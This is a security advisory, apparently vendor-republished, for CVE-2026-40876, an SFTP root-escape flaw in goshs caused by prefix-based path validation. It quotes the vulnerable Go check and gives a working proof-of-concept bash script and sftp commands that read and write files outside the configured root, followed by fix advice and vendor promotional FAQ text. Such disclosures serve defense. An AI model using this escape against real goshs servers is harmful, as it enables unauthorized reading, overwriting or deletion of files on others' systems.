Summary
goshs contains an SFTP root escape caused by prefix-based path validation. An authenticated SFTP user can read from and write to filesystem paths outside the configured SFTP root, which breaks the intended jail boundary and can expose or modify unrelated server files.
Details
The SFTP subsystem routes requests through sftpserver/sftpserver.go:99-126 into DefaultHandler.GetHandler() in sftpserver/handler.go:90-112, which forwards file operations into readFile, writeFile, listFile, and cmdFile. All of those sinks rely on sanitizePath() in sftpserver/helper.go:47-59. The vulnerable logic is:
cleanPath = filepath.Clean("/" + clientPath)
if !strings.HasPrefix(cleanPath, sftpRoot) {
return "", errors.New("access denied: outside of webroot")
}
This is a raw string-prefix comparison, not a directory-boundary check. Because of that, if the configured root is /tmp/goshsroot, then a sibling path such as /tmp/goshsroot_evil/secret.txt incorrectly passes validation since it starts with the same byte prefix.
That unsafe value then reaches filesystem sinks including:
os.Openinsftpserver/helper.go:80-94os.Createinsftpserver/helper.go:139-152os.Renameinsftpserver/helper.go:214-221os.RemoveAllinsftpserver/helper.go:231-232os.Mkdirinsftpserver/helper.go:242-243
This means an authenticated SFTP user can escape the configured jail and read, create, upload, rename, or delete content outside the intended root directory.
PoC
The configured SFTP root was /tmp/goshsroot, but the SFTP client was still able to access /tmp/goshsroot_evil/secret.txt and create /tmp/goshsroot_owned/pwned.txt, both of which are outside the configured root.
Manual verification commands used:
Terminal 1
cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta4'
go build -o /tmp/goshs_beta4 ./
rm -rf /tmp/goshsroot /tmp/goshsroot_evil /tmp/goshsroot_owned /tmp/outside_sftp.txt /tmp/local_upload.txt /tmp/goshs_beta4_client_key
mkdir -p /tmp/goshsroot /tmp/goshsroot_evil
printf 'outside secret\n' > /tmp/goshsroot_evil/secret.txt
printf 'proof via sftp write\n' > /tmp/local_upload.txt
cp sftpserver/goshs_client_key /tmp/goshs_beta4_client_key
chmod 600 /tmp/goshs_beta4_client_key
/tmp/goshs_beta4 -sftp -d /tmp/goshsroot --sftp-port 2222 \
--sftp-keyfile sftpserver/authorized_keys \
--sftp-host-keyfile sftpserver/goshs_host_key_rsa
Terminal 2
printf 'ls /tmp/goshsroot_evil\nget /tmp/goshsroot_evil/secret.txt /tmp/outside_sftp.txt\nmkdir /tmp/goshsroot_owned\nbye\n' | \
sftp -i /tmp/goshs_beta4_client_key -P 2222 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -b - [email protected]
printf 'put /tmp/local_upload.txt /tmp/goshsroot_owned/pwned.txt\nbye\n' | \
sftp -i /tmp/goshs_beta4_client_key -P 2222 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -b - [email protected]
cat /tmp/outside_sftp.txt
cat /tmp/goshsroot_owned/pwned.txt
Expected result:
ls /tmp/goshsroot_evilsucceeds even though that path is outside/tmp/goshsrootcat /tmp/outside_sftp.txtprintsoutside secretcat /tmp/goshsroot_owned/pwned.txtprintsproof via sftp write
PoC Video 1:
https://github.com/user-attachments/assets/d2c96301-afc8-4ddc-b008-74b235f94e31
Single-script verification:
'/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc1'
gosh_poc1 script content:
#!/usr/bin/env bash
set -euo pipefail
REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta4'
BIN='/tmp/goshs_beta4_sftp_escape'
ROOT='/tmp/goshsroot'
OUTSIDE='/tmp/goshsroot_evil'
OWNED='/tmp/goshsroot_owned'
CLIENT_KEY='/tmp/goshs_beta4_client_key'
DOWNLOAD='/tmp/outside_sftp.txt'
UPLOAD_SRC='/tmp/local_upload.txt'
PORT='2222'
SERVER_PID=""
cleanup() {
if [[ -n "${SERVER_PID:-}" ]]; then
kill "${SERVER_PID}" >/dev/null 2>&1 || true
wait "${SERVER_PID}" 2>/dev/null || true
fi
}
trap cleanup EXIT
echo '[1/6] Building goshs beta.4'
cd "${REPO}"
go build -o "${BIN}" ./
echo '[2/6] Preparing root and sibling paths'
rm -rf "${ROOT}" "${OUTSIDE}" "${OWNED}" "${DOWNLOAD}" "${UPLOAD_SRC}" "${CLIENT_KEY}"
mkdir -p "${ROOT}" "${OUTSIDE}"
printf 'outside secret\n' > "${OUTSIDE}/secret.txt"
printf 'proof via sftp write\n' > "${UPLOAD_SRC}"
cp "${REPO}/sftpserver/goshs_client_key" "${CLIENT_KEY}"
chmod 600 "${CLIENT_KEY}"
echo '[3/6] Starting SFTP server'
"${BIN}" -sftp -d "${ROOT}" --sftp-port "${PORT}" \
--sftp-keyfile "${REPO}/sftpserver/authorized_keys" \
--sftp-host-keyfile "${REPO}/sftpserver/goshs_host_key_rsa" \
>/tmp/gosh_poc1.log 2>&1 &
SERVER_PID=$!
for _ in $(seq 1 20); do
if python3 - <<PY
import socket
s = socket.socket()
try:
s.connect(("127.0.0.1", ${PORT}))
raise SystemExit(0)
except OSError:
raise SystemExit(1)
finally:
s.close()
PY
then
break
fi
sleep 1
done
echo '[4/6] Listing and downloading path outside configured root'
printf 'ls /tmp/goshsroot_evil\nget /tmp/goshsroot_evil/secret.txt /tmp/outside_sftp.txt\nmkdir /tmp/goshsroot_owned\nbye\n' | \
sftp -i "${CLIENT_KEY}" -P "${PORT}" -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -b - [email protected]
echo '[5/6] Writing a new file outside configured root'
printf 'put /tmp/local_upload.txt /tmp/goshsroot_owned/pwned.txt\nbye\n' | \
sftp -i "${CLIENT_KEY}" -P "${PORT}" -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -b - [email protected]
echo '[6/6] Verifying outside-root read and write'
echo "Downloaded content: $(cat "${DOWNLOAD}")"
echo "Written content: $(cat "${OWNED}/pwned.txt")"
if [[ "$(cat "${DOWNLOAD}")" == 'outside secret' ]] && [[ "$(cat "${OWNED}/pwned.txt")" == 'proof via sftp write' ]]; then
echo '[RESULT] VULNERABLE: authenticated SFTP user escaped the configured root'
else
echo '[RESULT] NOT REPRODUCED'
exit 1
fi
PoC Video 2:
https://github.com/user-attachments/assets/25e7a4d7-6ec7-40a6-b3d4-d66df3ea3e5f
Impact
This is a path traversal / jail escape in the SFTP service. Any authenticated SFTP user can break out of the configured root and access sibling filesystem paths that were never meant to be exposed through goshs. In practice this can lead to unauthorized file disclosure, arbitrary file upload outside the shared root, unwanted directory creation, overwrite of sensitive files, or data deletion depending on the reachable path and server permissions.
Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.
CVE-2026-40876 has a CVSS score of 8.8 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.0.0); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Suggested fixes:
- Replace the raw prefix check with a real directory-boundary validation such as requiring either exact root equality or
root + path separatoras the prefix. - Reuse the hardened HTTP-style path sanitizer across SFTP as well, so all file-serving modes share the same boundary logic.
- Add regression tests for sibling-prefix cases like
/tmp/goshsroot_evil, not only..traversal payloads.
Frequently Asked Questions
- What is CVE-2026-40876? CVE-2026-40876 is a high-severity path traversal vulnerability in github.com/patrickhener/goshs (go), affecting versions <= 1.1.4. It is fixed in 2.0.0. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
- How severe is CVE-2026-40876? CVE-2026-40876 has a CVSS score of 8.8 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which packages are affected by CVE-2026-40876?
github.com/patrickhener/goshs(go) (versions <= 1.1.4)github.com/patrickhener/goshs/v2(go) (versions < 2.0.0)
- Is there a fix for CVE-2026-40876? Yes. CVE-2026-40876 is fixed in 2.0.0. Upgrade to this version or later.
- Is CVE-2026-40876 exploitable, and should I be worried? Whether CVE-2026-40876 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-40876 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-40876? Upgrade
github.com/patrickhener/goshs/v2to 2.0.0 or later.